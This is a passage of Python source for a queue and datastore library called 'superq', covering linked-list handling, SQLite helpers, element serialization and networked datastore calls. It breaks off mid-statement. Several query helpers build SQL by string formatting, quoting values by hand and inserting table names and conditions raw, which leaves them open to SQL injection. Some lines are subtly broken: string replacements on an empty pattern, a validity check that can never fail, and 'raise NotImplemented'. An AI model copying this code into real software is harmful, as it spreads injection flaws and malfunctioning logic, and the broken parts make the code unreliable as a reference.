def move_down(self, node):\n        # can't move list node down if it is already tail\n        if node.next is None:\n            return\n\n        # these are aliases to the 4 starting elements involved\n        below_node_next = node.next.next\n        below_node = node.next\n        current_node = node\n        current_node_prev = node.prev\n\n        # do the pointer swaps\n        if current_node_prev is not None:\n            current_node_prev.next = below_node\n        below_node.prev = current_node_prev\n        below_node.next = current_node\n        current_node.prev = below_node\n        current_node.next = below_node_next\n        if below_node_next is not None:\n            below_node_next.prev = current_node\n\n        # if the swapped node is now at the top of the list, fix head\n        if below_node.prev is None:\n            self.head = below_node\n\n        # if node is now at the bottom of the list, set tail to node\n        if current_node.next is None:\n            self.tail = current_node\n\ndef db_exec(dbConn, sql, values = 
None):\n errors = 0\n while True:\n try:\n if values:\n dbConn.execute(sql, values)\n else:\n dbConn.execute(sql)\n break\n except OperationalError as e:\n # limit the amount of spinning in case there is a real error\n errors += 1\n if errors > 10:\n raise DBExecError('sql: {0}\\n'\n 'values: {1}\\n'\n 'exception: {2}'.format(sql, values, str(e)))\n\n # when using shared cache mode, sqlite ignores timeouts and\n # handlers; requiring for now this spinning solution.\n # shared cache mode is needed for parallel access of memory db\n sleep(.01)\n except Exception as e:\n raise DBExecError('sql: {0}\\n'\n 'values: {1}\\n'\n 'exception: {2}'.format(sql, values, str(e)))\n\n dbConn.commit()\n\ndef db_select(dbConn, sql, values = None):\n rowLst = []\n dbConn.row_factory = Row\n try:\n if values:\n result = dbConn.execute(sql, values)\n else:\n result = dbConn.execute(sql)\n except Exception as e:\n raise DBExecError('sql: {0}\\n'\n 'values: {1}\\n'\n 'exception: {2}'.format(sql, values, str(e)))\n\n for row in result:\n rowLst.append(row)\n\n return rowLst\n\ndef db_create_table(dbConn, tableName, colStr, values = None):\n db_exec(dbConn,\n 'CREATE TABLE {0} ({1});'.format(tableName, colStr),\n values)\n\ndef db_delete_table(dbConn, tableName, values = None):\n db_exec(dbConn,\n 'DROP TABLE {0};'.format(tableName),\n values)\n\ndef db_create_row(dbConn, tableName, colStr, valStr, values = None):\n db_exec(dbConn,\n 'INSERT INTO {0} ({1}) VALUES ({2});'.format(tableName,\n colStr,\n valStr),\n values)\n\ndef db_update_row(dbConn, tableName, updateStr, key, keyVal, values = None):\n db_exec(dbConn,\n 'UPDATE {0} SET {1} WHERE {2} = {3};'.format(tableName,\n updateStr,\n key,\n keyVal),\n values)\n \ndef db_delete_row(dbConn, tableName, key, keyVal, values = None):\n db_exec(dbConn,\n 'DELETE FROM {0} WHERE {1} = {2};'.format(tableName,\n key,\n keyVal),\n values)\n\n# instantiated for each superq app and for each network node process\nclass SuperQDataStore():\n def __init__(self):\n # networked datastores will set this to True\n self.public = False\n\n self._dataStoreBigLock = Lock()\n\n # keyed by sq.publicName, stores local sqs, caches remote ones\n self.superqdict = {}\n\n self.__networkClient = None\n\n # create detached superq to use for sqlite connection pool\n self.__dbConnPool = superq([])\n\n self.internalConn = self.__new_dbConn()\n\n def __new_dbConn(self):\n return connect('file:memdb1?mode=memory&cache=shared',\n uri = True,\n check_same_thread = False)\n\n def __get_dbConn(self):\n try:\n dbConn = self.__dbConnPool.pop(block = False)\n except SuperQEmpty:\n return self.__new_dbConn()\n else:\n return dbConn\n\n def __return_dbConn(self, s):\n self.__dbConnPool.push(s)\n\n def load_from_file(self):\n raise NotImplemented('SuperQDataStore.load_from_file()')\n \n def save_to_file(self):\n raise NotImplemented('SuperQDataStore.save_to_file()')\n \n def switch_to_disk_based(self):\n raise NotImplemented('SuperQDataStore.switch_to_disk_based()')\n\n def switch_to_in_memory(self):\n raise NotImplemented('SuperQDataStore.switch_to_in_memory()')\n\n def __get_networkClient(self):\n if self.__networkClient is None:\n self.__networkClient = SuperQNetworkClientMgr()\n\n return self.__networkClient\n\n # potentially starts the network datastore process when accessed\n networkClient = property(__get_networkClient)\n\n def shutdown(self):\n if self.__networkClient is not None:\n self.__networkClient.shutdown()\n\n def set_public(self):\n self.public = True\n\n def superq_exists(self, name, host = 
None, secure = False):\n # private datastore call public\n if host is not None and not self.public:\n publicName = '{0}.{1}'.format(host, name)\n return self.networkClient.superq_exists(publicName, host, secure)\n return name in self.superqdict\n\n def superq_create(self, sq, secure = False):\n # private datastore call public\n if sq.host is not None and not self.public:\n self.networkClient.superq_create(sq, secure)\n\n # add superq to dict after locking the entire collection\n self._dataStoreBigLock.acquire()\n if sq.publicName in self.superqdict:\n raise KeyError('superq {0} exists'.format(sq.publicName))\n else:\n self.superqdict[sq.publicName] = sq\n self._dataStoreBigLock.release()\n \n def superq_read(self, name, host = None, secure = False):\n # private datastore call public\n if host is not None and not self.public:\n publicName = '{0}.{1}'.format(host, name)\n sq = self.networkClient.superq_read(publicName, host, secure)\n\n if publicName not in self.superqdict:\n sq.attached = True\n self.superqdict[publicName] = sq\n else:\n # rebuild existing superq instance using incoming superq\n knownSq = self.superqdict[publicName]\n knownSq.buildFromStr(str(sq))\n\n sq = knownSq\n else:\n # expected to raise KeyError if superq not known\n sq = self.superqdict[name]\n\n return sq\n\n def superq_delete(self, sq, secure = False):\n # delete superq from dict after locking the entire collection\n self._dataStoreBigLock.acquire()\n if sq.publicName in self.superqdict:\n del(self.superqdict[sq.publicName])\n else:\n raise KeyError('superq {0} does not exist'.format(sq.publicName))\n self._dataStoreBigLock.release()\n \n # private datastore call public\n if sq.host is not None and not self.public:\n self.networkClient.superq_delete(sq, secure)\n return\n\n # delete backing table if there are superqelems\n if len(sq) > 0:\n dbConn = self.__get_dbConn()\n db_delete_table(dbConn, sq.name)\n self.__return_dbConn(dbConn)\n\n def superq_query_local(self, queryStr, objSample = None):\n dbConn = self.__get_dbConn()\n rows = db_select(dbConn, queryStr)\n self.__return_dbConn(dbConn)\n\n newSq = superq([])\n\n for row in rows:\n # demarshal single-value objects\n if isinstance(objSample, str):\n newSq.create_elem(str(row['_val_']))\n continue\n elif isinstance(objSample, int):\n newSq.create_elem(int(row['_val_']))\n continue\n elif isinstance(objSample, float):\n newSq.create_elem(float(row['_val_']))\n continue\n elif isinstance(objSample, bytearray):\n newSq.create_elem(bytearray(row['_val_']))\n\n if objSample is None:\n newObj = superqelem(parentSq = newSq)\n else:\n newObj = copy(objSample)\n\n # demarshal multi-value objects\n for col in row.keys():\n # extract field name from col name\n colElems = col.split('.')\n fieldName = colElems[len(colElems) - 1]\n\n if isinstance(newObj, superqelem):\n newObj.add_atom(fieldName, 'str', row[fieldName])\n continue\n\n objVal = getattr(newObj, fieldName)\n if isinstance(objVal, str):\n val = str(row[fieldName])\n elif isinstance(objVal, int):\n val = int(row[fieldName])\n elif isinstance(objVal, float):\n val = float(row[fieldName])\n elif isinstance(objVal, bytearray):\n # bytearrays must be uncompressed\n val = rledecode_hqx(bytearray(row[fieldName]))\n else:\n valType = type(objVal)\n raise TypeError('unsupported type ({0})'.format(valType))\n\n setattr(newObj, fieldName, val)\n\n newSq.create_elem(newObj)\n\n # clear objSample from being set by first create_elem\n newSq.objSample = None\n\n return newSq\n \n def superq_query(self,\n sq,\n columns,\n 
tables,\n conditional,\n objSample = None,\n secure = False):\n # create column string and list from input\n if isinstance(columns, list):\n colStr = ','.join(columns)\n colLst = columns\n elif isinstance(columns, str):\n colStr = columns\n colLst = columns.split(',')\n else:\n raise TypeError('invalid type ({0})'.format(type(columns)))\n\n # create table string and list from input\n if isinstance(tables, list):\n tableStr = ','.join(tables)\n tableLst = tables\n elif isinstance(tables, str):\n tableStr = tables\n tableLst = tables.split(',')\n else:\n raise TypeError('invalid type ({0})'.format(type(tables)))\n\n if '' not in tableStr:\n raise ValueError('join tables ({0}) not valid.'.format(tableStr))\n\n # do some pre-processing and construct query\n colStr = colStr.replace('', sq.name)\n tableStr = tableStr.replace('', sq.name)\n conditional = conditional.replace('', sq.name)\n queryStr = 'SELECT {0} FROM {1} WHERE {2};'.format(colStr,\n tableStr,\n conditional)\n\n # execute query locally if superq is not public or the datastore is\n if sq.host is None or self.public:\n return self.superq_query_local(queryStr, objSample)\n\n resultSq = self.networkClient.superq_query(sq, queryStr, secure)\n\n if objSample is None:\n return resultSq\n\n newSq = superq([])\n\n # if there is a sample object available, demarshal accordingly\n for sqe in resultSq:\n # demarshal single-value objects\n if isinstance(objSample, str):\n newSq.create_elem(str(sqe['_val_']))\n continue\n elif isinstance(objSample, int):\n newSq.create_elem(int(sqe['_val_']))\n continue\n elif isinstance(objSample, float):\n newSq.create_elem(float(sqe['_val_']))\n continue\n elif isinstance(objSample, bytearray):\n newSq.create_elem(bytearray(sqe['_val_']))\n continue\n\n newObj = copy(objSample)\n\n # demarshal multi-value objects\n for atom in sqe:\n col = atom.name\n\n # extract field name from col name\n colElems = col.split('.')\n fieldName = colElems[len(colElems) - 1]\n\n objVal = getattr(newObj, fieldName)\n if isinstance(objVal, str):\n val = str(atom.value)\n elif isinstance(objVal, int):\n val = int(atom.value)\n elif isinstance(objVal, float):\n val = float(atom.value)\n elif isinstance(objVal, bytearray):\n val = bytearray(atom.value)\n else:\n valType = type(objVal)\n raise TypeError('unsupported type ({0})'.format(valType))\n\n setattr(newObj, fieldName, val)\n\n newSq.create_elem(newObj)\n\n return newSq\n\n def superqelem_exists(self, sq, sqeName):\n return sqeName in self.superqdict[sq.publicName][sqeName]\n\n def superqelem_create(self,\n sq,\n sqe,\n idx = None,\n createTable = False,\n secure = False):\n # private datastore call public\n if sq.host is not None and not self.public:\n self.networkClient.superqelem_create(sq, sqe, idx, secure)\n return\n\n # the backing db table is only created when the 1st element is added\n if createTable:\n dbConn = self.__get_dbConn()\n db_create_table(dbConn, sq.name, sq.nameTypeStr)\n self.__return_dbConn(dbConn)\n\n valStr = ''\n values = []\n if sqe.value is not None:\n valStr += '?,?,?'\n values.append(sqe.name)\n values.append(sqe.value)\n values.append(sqe.links)\n else:\n atomDict = sqe.dict()\n for colName in sq.colNames:\n # support standard columns\n if colName == '_name_':\n valStr += '?,'\n values.append(sqe.name)\n continue\n elif colName == '_links_':\n valStr += '?,'\n values.append(sqe.links)\n continue;\n\n atom = atomDict[colName]\n\n values.append(atom.value)\n valStr += '?,'\n valStr = valStr.rstrip(',')\n\n dbConn = self.__get_dbConn()\n 
db_create_row(dbConn, sq.name, sq.nameStr, valStr, tuple(values))\n        self.__return_dbConn(dbConn)\n\n    def __superqelem_update_db(self, sq, sqe):\n        # support autoKey\n        keyCol = sq.keyCol\n        if keyCol is None:\n            keyCol = '_name_'\n\n        # handle scalars\n        if sqe.value is not None:\n            val = sqe.value\n            if sqe.valueType.startswith('str'):\n                val = \"'{0}'\".format(val)\n            \n            updateStr = '{0}={1}'.format('_val_', val)\n        else:\n            updateStr = ''\n\n        for i in range(0, len(sq.colNames)):\n            name = sq.colNames[i]\n\n            # no need to update key column\n            if name == keyCol or name == '_name_':\n                continue\n            elif name == '_links_':\n                # deal with links column after all the rest\n                continue\n\n            val = sqe[sq.colNames[i]]\n            if sq.colTypes[i].startswith('str'):\n                val = \"'{0}'\".format(val)\n\n            updateStr += '{0}={1},'.format(name, val)\n        updateStr = updateStr.rstrip(',')\n\n        # special-case _links_ column\n        updateStr += \",{0}='{1}'\".format('_links_', sqe.links)\n\n        # quote sqe name if it's a string\n        sqeName = sqe.name\n        if isinstance(sqeName, str):\n            sqeName = \"'{0}'\".format(sqeName)\n\n        dbConn = self.__get_dbConn()\n        db_update_row(dbConn, sq.name, updateStr, keyCol, sqeName)\n        self.__return_dbConn(dbConn)\n\n    def superqelem_read(self, sq, sqeName, secure = False):\n        # private datastore call public\n        if sq.host is not None and not self.public:\n            sqe = self.networkClient.superqelem_read(sq.name, sqeName, secure)\n\n            if self.superqelem_exists(sq, sqeName):\n                self.__superqelem_update_db(sq, sqe)\n            else:\n                raise ObjectNotRecognized('sqe \\'' + sqeName + '\\' not known.')\n\n            self.superqdict[sq.publicName][sqeName] = sqe\n            return sqe\n\n        # raises KeyValue error if superqelem not known\n        return self.superqdict[sq.publicName][sqeName]\n\n    def superqelem_update(self, sq, sqe, secure = False):\n        # private datastore call public\n        if sq.host is not None and not self.public:\n            sqe = self.networkClient.superqelem_update(sq, sqe, secure)\n            return\n\n        self.__superqelem_update_db(sq, sqe)\n\n    def superqelem_delete(self, sq, sqeName, secure = False):\n        # private datastore call public \n        if sq.host is not None and not self.public:\n            self.networkClient.superqelem_delete(sq, sqeName, secure)\n            return\n\n        # wrap with quotes if sqe key is str\n        if isinstance(sqeName, str):\n            sqeName = \"'{0}'\".format(sqeName)\n\n        # support autoKey\n        keyCol = sq.keyCol\n        if keyCol is None:\n            keyCol = '_name_'\n\n        dbConn = self.__get_dbConn()\n        db_delete_row(dbConn, sq.name, keyCol, sqeName)\n        self.__return_dbConn(dbConn)\n\nclass elematom(LinkedListNode):\n    def __init__(self, name, type_, value):\n        LinkedListNode.__init__(self)\n\n        self.name = name\n        self.type = type_\n        self.value = value\n\nclass superqelem(LinkedListNode):\n    def __init__(self,\n                 name = None,\n                 value = None,\n                 parentSq = None,\n                 buildFromStr = False):\n        LinkedListNode.__init__(self)\n\n        # list of elematoms\n        self.__internalList = LinkedList()\n\n        # dictionary of elematoms, keyed by 'field' name\n        self.__internalDict = {}\n\n        # any sqe can link to any number of other sqes\n        self.links = ''\n        self.linksDict = {}\n\n        if name is None:\n            name = str(uuid4().hex)\n\n        self.name = name\n        self.value = value\n\n        if self.value is None:\n            self.value = name\n\n        self.parentSq = parentSq\n\n        # used to remember user object for local instance\n        self.obj = None\n\n        # construct publicName property and add it to the class\n        getter = lambda self: self.__get_publicName()\n        setattr(self.__class__,\n                'publicName',\n                property(fget = getter, fset = None))\n\n        if buildFromStr:\n            self.__buildFromStr(self.value)\n            return\n\n        
if not isinstance(self.name, (str, int, float)):\n raise TypeError('invalid name type ({0})'.format(type(self.name)))\n\n # handle scalars\n self.valueType = ''\n if isinstance(value, (str, int, float)):\n self.valueType = type(self.value).__name__\n return\n elif isinstance(value, bytearray):\n # compress bytearray\n self.value = rlecode_hqx(value)\n\n self.valueType = type(self.value).__name__\n return\n\n # only scalars keep value set\n self.value = None\n\n # non-scalars should 'remember' the user object they're created from\n self.obj = value\n\n # handle non-scalars\n self.obj = value\n for attrName in dir(value):\n attr = getattr(value, attrName)\n\n # skip private attributes and callables\n if attrName.startswith('_') or callable(attr):\n continue\n\n # ignore any attributes whose types aren't supported\n if not isinstance(attr, (str, int, float, bytearray)):\n continue\n\n # add object field as superqelem property\n if isinstance(attr, bytearray):\n self.add_property_ba(attrName)\n\n # compress bytearray\n attr = rlecode_hqx(attr)\n else:\n self.add_property(attrName)\n\n self.add_atom(attrName, type(attr).__name__, attr)\n\n # called for all attribute assignments\n def __setattr__(self, attr, value):\n # handle the setting of links to other sqes\n if (isinstance(value, superqelem) and\n attr != 'prev' and attr != 'next'): # clumsy LinkedList avoidance\n # update link if it exists already\n if attr in self.linksDict:\n oldValue = self.linksDict[attr]\n newValue = value.publicName\n self.links = self.links.replace('{0}^{1}'.format(attr,\n oldValue),\n '{0}^{1}'.format(attr,\n newValue))\n else:\n self.links += '{0}^{1}/'.format(attr, value.publicName)\n\n # now set the dictionary value\n self.linksDict[attr] = value.publicName\n\n # trigger update\n if self.parentSq is not None:\n self.parentSq.update_elem_datastore_only(self)\n else:\n # compress bytearray\n if isinstance(value, bytearray):\n value = rlecode_hqx(value)\n\n # call default setattr behavior\n object.__setattr__(self, attr, value)\n\n # called only when a non-existant attribute is accessed\n def __getattr__(self, attr):\n if attr in self.linksDict:\n # lookup and return linked sqe\n sqName, sqeName = self.linksDict[attr].rsplit('.', 1)\n return superq(sqName)[sqeName]\n\n raise AttributeError\n\n def __get_publicName(self):\n if self.parentSq is None:\n return self.name\n return '{0}.{1}'.format(self.parentSq.publicName, self.name)\n\n def set_scalar(self, value):\n # scalar superqelems don't have properties\n if self.value is None:\n return\n\n if isinstance(self.value, str):\n value = str(value)\n elif isinstance(self.value, int):\n value = int(value)\n elif isinstance(self.value, float):\n value = float(value)\n elif isinstance(self.value, bytearray):\n # compress bytearray\n value = rlecode_hqx(bytearray(value))\n\n self.value = value\n\n # trigger update\n if self.parentSq is not None:\n self.parentSq.update_elem(self)\n\n def add_property(self, attr):\n # create local setter and getter with a particular attribute name\n getter = lambda self: self.__get_property(attr)\n setter = lambda self, value: self.__set_property(attr, value)\n\n # construct property attribute and add it to the class\n setattr(self.__class__, attr, property(fget = getter, fset = setter))\n\n def add_property_ba(self, attr):\n # create local setter and getter with a particular attribute name\n getter = lambda self: self.__get_property_ba(attr)\n setter = lambda self, value: self.__set_property_ba(attr, value)\n\n # construct property 
attribute and add it to the class\n setattr(self.__class__, attr, property(fget = getter, fset = setter))\n\n # dynamic property getter\n def __get_property(self, attr):\n if attr in self.__internalDict:\n return self.__internalDict[attr].value\n else:\n raise SuperQEx('unrecognized attribute: {0}'.format(attr))\n\n # dynamic property setter\n def __set_property(self, attr, value):\n # remember attribute\n self.__internalDict[attr].value = value\n\n # maintain state if there is an original user object\n if self.obj is not None:\n setattr(self.obj, attr, value)\n\n # trigger update\n if self.parentSq is not None:\n self.parentSq.update_elem_datastore_only(self)\n\n # dynamic property getter for bytearrays\n def __get_property_ba(self, attr):\n if attr in self.__internalDict:\n # uncompress and return data\n return rledecode_hqx(self.__internalDict[attr].value)\n else:\n raise SuperQEx('unrecognized attribute: {0}'.format(attr))\n\n # dynamic property setter for bytearrays\n def __set_property_ba(self, attr, value):\n # compress and store data\n self.__internalDict[attr].value = rlecode_hqx(value)\n\n # maintain state if there is an original user object\n if self.obj is not None:\n setattr(self.obj, attr, value)\n\n # trigger update\n if self.parentSq is not None:\n self.parentSq.update_elem_datastore_only(self)\n\n def resetLinks(self):\n self.linksDict = {}\n self.links = ''\n\n def addLinksFromStr(self, linksStr):\n linkElems = linksStr.split('/')\n for link in linkElems:\n if not link:\n break\n\n # add link\n key, value = link.split('^')\n self.links += '{0}/'.format(link)\n self.linksDict[key] = value\n\n def __buildFromStr(self, sqeStr):\n headerSeparatorIdx = sqeStr.index(';')\n\n # separate out sqe header from remainder\n sqeHeader = sqeStr[ : headerSeparatorIdx]\n sqeBody = sqeStr[headerSeparatorIdx + 1 : ]\n\n # parse out header fields\n headerElems = sqeHeader.split(',', 5)\n\n # name-type and name-value\n nameType = headerElems[0]\n if nameType.startswith('str'):\n self.name = str(headerElems[1])\n elif nameType.startswith('int'):\n self.name = int(headerElems[1])\n elif nameType.startswith('float'):\n self.name = float(headerElems[1])\n\n # value-type and actual value\n self.valueType = headerElems[2]\n if self.valueType.startswith('str'):\n self.value = str(headerElems[3])\n elif self.valueType.startswith('int'):\n self.value = int(headerElems[3])\n elif self.valueType.startswith('float'):\n self.value = float(headerElems[3])\n elif self.valueType.startswith('byte'):\n # ignore str frame \"b'...'\"\n byteStr = headerElems[3][2 : -1]\n\n self.value = unhexlify(byteStr)\n\n # add links individually\n self.addLinksFromStr(headerElems[4])\n\n # scalar superqelems\n if self.valueType != '':\n return\n\n # only scalar superqelems should use value\n self.value = None\n\n # number of fields or atoms\n numFields = int(headerElems[5])\n\n # parse out each field\n for i in range(0, numFields):\n # separate field length indicator from remainder\n separatorIdx = sqeBody.index('|')\n fieldLen = int(sqeBody[ : separatorIdx])\n sqeBody = sqeBody[separatorIdx + 1 : ]\n\n # slice the rest of the field out\n field = sqeBody[ : fieldLen - 1]\n sqeBody = sqeBody[fieldLen : ]\n\n # slice field name from field\n separatorIdx = field.index('|')\n fieldName = field[ : separatorIdx]\n field = field[separatorIdx + 1 : ]\n\n # now retrieve type and value\n separatorIdx = field.index('|')\n fieldType = field[ : separatorIdx]\n\n fieldValue = field[separatorIdx + 1 : ]\n if fieldType.startswith('int'):\n 
fieldValue = int(fieldValue)\n elif fieldType.startswith('float'):\n fieldValue = float(fieldValue)\n elif fieldType.startswith('byte'):\n # ignore str frame \"b'...'\"\n byteStr = fieldValue[2 : -1]\n\n fieldValue = unhexlify(byteStr)\n\n self.add_atom(fieldName, fieldType, fieldValue)\n\n def __iter__(self):\n self.iterNext = self.__internalList.head\n\n return self\n\n def __next__(self):\n returnObj = self.iterNext\n\n if returnObj:\n self.iterNext = self.iterNext.next\n else:\n raise StopIteration\n\n return returnObj\n\n def __getitem__(self, key):\n if key in self.__internalDict:\n atom = self.__internalDict[key]\n elif isinstance(key, int) and key < len(self.__internalDict):\n # if atom isn't keyed on the int, try the int as an index\n atom = self.__internalList[key]\n else:\n raise KeyError(key)\n\n if atom.type.startswith('byte'):\n # decompress and return data\n return rledecode_hqx(atom.value)\n else:\n return atom.value\n\n def __setitem__(self, key, value):\n if key in self.__internalDict:\n atom = self.__internalDict[key]\n elif isinstance(key, int) and key < len(self.__internalDict):\n # if atom isn't keyed on the int, try the int as an index\n atom = self.__internalList[key]\n else:\n raise KeyError(key)\n\n if atom.type.startswith('byte'):\n # compress and store data\n atom.value = rlecode_hqx(value)\n else:\n atom.value = value\n\n def __str__(self):\n sqeStr = '{0},{1},{2},{3},{4},{5};'.format(type(self.name).__name__,\n self.name,\n self.valueType,\n self.value,\n self.links,\n len(self.__internalList))\n for atom in self:\n if atom.type.startswith('byte'):\n # convert bytearray to string\n value = hexlify(atom.value)\n else:\n value = atom.value\n elemStr = '{0}|{1}|{2};'.format(atom.name, atom.type, value)\n\n sqeStr += '{0}|{1}'.format(len(elemStr), elemStr)\n \n return sqeStr\n\n def __basecopy(self):\n # initialize new sqe\n sqe = superqelem(self.name, self.value, self.parentSq)\n\n # remember user obj\n sqe.obj = self.obj\n\n # add links individually\n sqe.addLinksFromStr(self.links)\n\n # add atoms\n for atom in self:\n sqe.add_atom(atom.name, atom.type, atom.value)\n\n return sqe\n\n def __copy__(self):\n return self.__basecopy()\n\n def __deepcopy__(self):\n return self.__basecopy()\n\n # return internal list\n def _list(self):\n return self.__internalList\n\n # return internal list as python list\n def list(self):\n return [val for val in self]\n\n def dict(self):\n return self.__internalDict\n\n def add_atom(self, name, type_, value):\n atom = elematom(name, type_, value)\n\n self.__internalDict[name] = atom\n self.__internalList.push_tail(atom)\n\n def __key_user_obj(self, obj):\n # if possible, make user object relatable back to superqelem\n try:\n setattr(obj, '_superqelemKey', self.name)\n except Exception:\n # one reason for arriving here might be obj is a __slots__ object\n pass\n return obj \n\n def demarshal(self, objSample = None):\n # return original user object if it is known\n if self.obj is not None:\n return self.__key_user_obj(self.obj)\n\n # return superqelem if nothing provided to demarshal into\n if objSample is None:\n return self\n\n # demarshal single-value objects\n if isinstance(objSample, str):\n return str(self['_val_'])\n elif isinstance(objSample, int):\n return int(self['_val_'])\n elif isinstance(objSample, float):\n return float(self['_val_'])\n elif isinstance(objSample, bytearray):\n # uncompress and return data\n return rledecode_hqx(bytearray(self['_val_']))\n\n # demarshal multi-value objects\n newObj = copy(objSample)\n 
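# copy each atom's value onto the matching attribute of the sample copy,\n # coercing to that attribute's existing type\n 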
for name, atom in self.__internalDict.items():\n objVal = getattr(newObj, atom.name)\n if isinstance(objVal, str):\n val = str(atom.value)\n elif isinstance(objVal, int):\n val = int(atom.value)\n elif isinstance(objVal, float):\n val = float(atom.value)\n elif isinstance(objVal, bytearray):\n # uncompress data\n val = rledecode_hqx(bytearray(atom.value))\n else:\n raise TypeError('unsupported type ({0})'.format(type(objVal)))\n\n setattr(newObj, atom.name, val)\n\n return self.__key_user_obj(newObj)\n\nclass superq():\n # overriding __new__ in order to be able to return existing objects\n def __new__(cls,\n initObj,\n name = None,\n host = None,\n attach = False,\n keyCol = None,\n maxlen = None,\n buildFromStr = False,\n buildFromFile = False,\n secure = False):\n # str initObj can contain string and file deserialization info\n if not buildFromStr and not buildFromFile:\n if isinstance(initObj, str):\n # return datastore superq if it exists\n if _dataStore.superq_exists(initObj, host, secure):\n return _dataStore.superq_read(initObj, host)\n else:\n raise KeyError('superq {0} does not exist'.format(initObj))\n\n return object.__new__(cls)\n\n def __init__(self,\n initObj,\n name = None,\n host = None,\n attach = False,\n keyCol = None,\n maxlen = None,\n buildFromStr = False,\n buildFromFile = False,\n secure = False):\n # get DataStore handle\n self.dataStore = _dataStore\n\n # skip initialization if __init__ is being called on an existing object\n if hasattr(self, 'initialized'):\n return\n\n # mutex must be held whenever the queue is mutating. All methods\n # that acquire mutex must release it before returning. mutex is\n # shared between the conditions, so acquiring and releasing the\n # conditions also acquires and releases mutex\n self.mutex = RLock()\n\n # notify not_empty whenever an item is added to the queue; a\n # thread waiting to get is notified then\n self.not_empty = Condition(self.mutex)\n\n # notify not_full whenever an item is removed from the queue;\n # a thread waiting to put is notified then\n self.not_full = Condition(self.mutex)\n\n self.name = name\n\n # if no name provided, one will be assigned\n if self.name is None:\n self.name = 'sq' + str(uuid4().hex)\n\n # indicates whether superq is currently backed in the datastore\n self.attached = False\n\n # attached superqs with no host use the private local-process datastore\n self.host = host\n\n # indicates object field to be used as sqe key\n self.keyCol = keyCol\n\n # if maxlen is None, superq may grow unbounded\n self.maxlen = maxlen\n\n # object type is established when the 1st element is added or when\n # superq user manually specifies. This is the type superqelems will\n # be demarshalled into when requested. 
Or, if None, superqelems will\n # be directly returned (or they can be requested through self.n())\n self.objSample = None\n\n # these describe the superq backing schema and are populated after\n # using introspection on the 1st element added\n self.colNames = []\n self.colTypes = []\n self.nameStr = '' # comma-delimited list, usable in INSERTs\n self.nameTypeStr = '' # names and types, usable in CREATEs\n\n # indicates backing db table should be created next attached add elem\n self.createTable = False\n\n # superqelems are arrayed like a list but mapped like a dictionary\n self.__internalList = LinkedList()\n self.__internalDict = {}\n\n # automatically generates key column\n self.autoKey = False\n if self.keyCol is None:\n self.autoKey = True\n\n # set for secure network connections\n self.secure = secure\n\n # construct publicName property and add it to the class\n getter = lambda self: self.__get_publicName()\n setattr(self.__class__,\n 'publicName',\n property(fget = getter, fset = None))\n\n # deserializes from string or file\n if buildFromStr:\n self.buildFromStr(initObj, attach)\n self.initialized = True\n return\n elif buildFromFile:\n self.buildFromFile(initObj, attach)\n self.initialized = True\n return\n\n if isinstance(initObj, superq):\n # self.__copy__ and __deepcopy__ arrive here\n for elem in initObj:\n self.create_elem(copy(elem), name = elem.name)\n elif isinstance(initObj, list):\n for item in initObj:\n self.create_elem(item)\n elif isinstance(initObj, dict):\n for key, value in initObj.items():\n self.create_elem(value, name = key)\n else:\n raise TypeError('Unsupported type ({0})'.format(type(initObj)))\n\n # creates new superq in datastore or attaches to existing one\n if attach:\n self.attach()\n\n # skip __init__ in the future if superq is returned by __new__\n self.initialized = True\n\n def __get_publicName(self): \n if self.host is None:\n return self.name\n return '{0}.{1}'.format(self.host, self.name)\n\n def __len__(self):\n return len(self.__internalList)\n\n def __contains__(self, key):\n return key in self.__internalDict\n\n def __iter__(self):\n self.next = self.__internalList.head\n\n return self\n\n def __next__(self):\n elem = self.next\n\n if self.next:\n self.next = self.next.next\n else:\n raise StopIteration\n\n # if superqelem is scalar, just return value\n if elem.value is not None:\n return elem.value\n\n return elem.demarshal(self.objSample)\n\n def __getitem__(self, val):\n if isinstance(val, slice):\n start, stop, step = val.indices(len(self))\n\n sq = superq([])\n if start in self.__internalDict:\n sqe = self.__internalDict[start]\n sq.create_elem(copy(sqe))\n while sqe.name != stop:\n sqe = sqe.next\n if sqe.name == start:\n break\n sq.create_elem(copy(sqe))\n elif isinstance(start, int):\n sqSlice = self.__internalList[val]\n for sqe in sqSlice:\n sq.create_elem(copy(sqe))\n else:\n raise TypeError('Invalid type ({0})'.format(type(val)))\n\n return sq\n elif val in self.__internalDict:\n elem = self.__internalDict[val]\n elif isinstance(val, int):\n if val < len(self.__internalDict):\n # if element isn't keyed on the int, use it as an index\n elem = self.__internalList[val]\n else:\n raise KeyError('Invalid key ({0})'.format(val))\n else:\n raise TypeError('Invalid type ({0})'.format(type(val)))\n\n return self.__unwrap_elem(elem)\n\n def __setitem__(self, key, value):\n if key in self.__internalDict:\n elem = self.__internalDict[key]\n elif isinstance(key, int) and key < len(self):\n # if element isn't keyed on the int, try the int as 
an index\n elem = self.__internalList[key] \n else:\n self.create_elem(value, key)\n return\n\n # set scalar value\n if elem.value is not None:\n elem.set_scalar(value)\n return\n \n raise NotImplementedError('__setitem__ by index for non-scalars')\n\n def __delitem__(self, key):\n raise NotImplementedError('superq.__delitem__()')\n\n def __missing__(self, key):\n raise KeyError(key)\n\n def __basecopy(self):\n return superq(self, name = self.name, attach = False)\n\n def __copy__(self):\n return self.__basecopy()\n\n def __deepcopy__(self):\n return self.__basecopy()\n\n def __str__(self):\n sqHdr = '{0},{1};'.format(self.name, len(self.__internalList))\n\n # serialize necessary attributes as name-value pairs\n sqAttrs = ''\n sqAttrs += 'host|{0},'.format(self.host)\n sqAttrs += 'keyCol|{0},'.format(self.keyCol)\n sqAttrs += 'maxlen|{0},'.format(self.maxlen)\n sqAttrs += 'autoKey|{0}'.format(self.autoKey)\n sqAttrs += ';'\n\n sqElems = ''\n for sqe in self.__internalList:\n sqeStr = str(sqe)\n sqElems += '{0},{1}'.format(len(sqeStr), sqeStr)\n\n sqStr = '{0}{1}{2}'.format(sqHdr, sqAttrs, sqElems)\n\n return sqStr\n\n # returns value wrapped in superqelem if it was not already\n def __wrap_elem(self, value, name = None):\n if isinstance(value, superqelem):\n sqe = value\n else:\n # if autoKey on, name will be assigned\n if self.autoKey:\n name = 'sqe' + str(uuid4().hex)\n elif self.keyCol is not None:\n try:\n name = getattr(value, self.keyCol)\n except:\n raise KeyError('Key field {0} not found.'.format(name))\n elif name is None:\n raise ValueError('name is None with no autoKey or keyCol')\n\n sqe = superqelem(name, value, parentSq = self)\n\n return sqe\n\n # if elem is scalar, returns value or demarshals sqe if possible\n def __unwrap_elem(self, sqe):\n # if superqelem is scalar, just return value\n if sqe.value is not None:\n return sqe.value\n\n # sqe is now detached\n sqe.parentSq = None\n\n # demarshal into user object if possible\n returnObj = sqe.demarshal(self.objSample)\n\n return 